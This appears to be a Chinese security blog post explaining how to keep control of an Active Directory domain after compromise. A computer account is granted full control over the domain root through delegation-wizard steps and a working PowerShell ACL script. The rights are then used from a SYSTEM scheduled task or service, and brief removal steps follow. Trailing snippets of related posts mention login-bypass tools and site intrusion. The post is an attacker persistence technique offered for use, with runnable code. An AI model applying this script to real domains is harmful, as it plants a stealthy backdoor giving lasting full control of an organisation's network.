通过ACL维持域控权限

VSole2021-10-21 09:14:15

前置要求

  1. 已获得域管理权限
  2. 有一台域下的计算机SYSTEM权限

相较于其他维权方式的优点:

常见的方法都是围绕着用户、密码、票据来实现权限维持。

此方法不需要添加域账号,也就不用为密码过期、账号禁用、票据操作而头疼。

操作步骤

界面上操作

  1. 右键域->委派控制


  1. 添加->高级->对象类型->勾选计算机 找到有权限的计算机


  1. 创建自定义任务


  1. 默认值,下一步


  1. 选择完全控制

使用powershell修改

powershell

1
2
3
4
5
6
7
8
9
10
Import-Module ActiveDirectory
$ad = [ADSI]("LDAP://DC=zpyjjd,DC=com")
$computer = Get-ADComputer -Identity "WIN-N39A9OGCR8N"
$Identity = New-Object 'Security.Principal.SecurityIdentifier' $computer.SID.Value
$rights = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
$type = [System.Security.AccessControl.AccessControlType]::Allow
$inherit = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$rights,$type,$inherit
$ad.ObjectSecurity.AddAccessRule($ace)
$ad.CommitChanges()


此时该计算机就具备整个域控的权限。

如何触发

  1. 可以通过计划任务,创建一个SYSTEM权限运行计划
  2. 也可以通过创建SYSTEM运行的服务来触发

如何删除

  1. 选择高级功能
  2. 右键域,选择属性。再选择安全,最后选择之前添加的计算机,点击删除

电脑system
本作品采用《CC 协议》,转载必须注明作者和本文链接
电脑被挖矿分析
2021-10-12 15:39:27
由于区块链技术热炒以及数字货币魔性推广运营,如比特币、以太币、门罗币、达世币等层出不穷的数字货币被各种热炒,在这些的利益驱使下,便出现各种模式的挖矿木马程序。挖矿木马主要就是通过利用各种手段,将挖矿程序植入到用户的计算机中,在用户未感知到的情况下,偷偷利用用户的计算机进行执行挖矿功能,从而获取收益。
近期有使用手机投屏的需求,用过几个小工具感觉效果不是很理想,所以想着着手分析下。
最近不知道怎么回事,家里电脑经常性地出现蓝屏,很多时候有些文档没有保存便蓝屏导致文档丢失,其中也包括您现在正在看到的这一篇文章,以前一直比较懒,重启大法一顿怼,然后重新再做编辑,只不过PPT重做简直要人命,无奈之下,放下了所有的工作。
某些安全措施严格的目标,还会启用Bitlocker磁盘加密。配置与使用完整版本的Kon-Boot是付费软件,个人许可证价格为$50,商业许可证价格为$140。该版本可以绕过除Windows 10的在线账户之外的密码。右键,以管理员身份运行bat。但在目前,GrabAccess仅支持UEFI引导的64位系统。针对Windows xp,或MBR引导的Windows 7,仍推荐Kon-Boot。在不登陆的情况下,也可以执行系统命令或读写文件。至此GrabAccess的最简安装完成。在启动时进入BIOS菜单。选择从U盘启动,或设置U盘为第一启动项。
惠普 OMEN 笔记本电脑和台式游戏计算机中的一个高度严重漏洞(被跟踪为CVE-2021-3437)使数百万系统面临 DoS 和特权升级攻击。
WEB安全梳理-操作系统
2022-08-10 07:16:03
WEB安全梳理-操作系统
网安引领时代,弥天点亮未来 0x00序言在日常工作中,如果办公电脑或者个人PC有以下两个方面的异常行为
0x00 前言在2021年12月的某星期天的下午,成都飘着小雨,冷的瑟瑟发抖,在家里打开电脑开始学习,但是无意间发现之前渗透的非法网站又开起来了,但是只是一个宝塔页面,没有任何价值,于是在同ip下发现一个博彩网站,随之展开渗透0x01?弱口令啊,YYDS!!
从uart 进入uboot shell某路由器设备拆开后定位到uart接口,将uart引脚通过TTL接入到电脑,路由器上电启动,观察启动日志。从上面设备的部分启动日志可以看出,uboot shell可以被中断,路由器上电后快速按任意键可进入。为了方便后续逆向工作,最好能进入路由器系统,但目前是console已关闭,且未发现telnet、ssh等服务,只能从uboot shell为切入点进一步分析。
在互联网尚未普及的时代,机构唯一需要担心的就是内网中员工使用的办公电脑。而现在,远不只是在写字楼,员工会在机场、咖啡店、酒店办公,由于疫情时代,居家办公更是常态。 与在公司内网上对终端进行保护相比,居家办公的终端面临的威胁完全不一样。恶意软件泛滥的游戏设备、连接互联网的电视、音箱、摄像头……这些智能设备的软件可能上一次更新是在几年前,都与你的办公电脑处在同一个局域网。
VSole
网络安全专家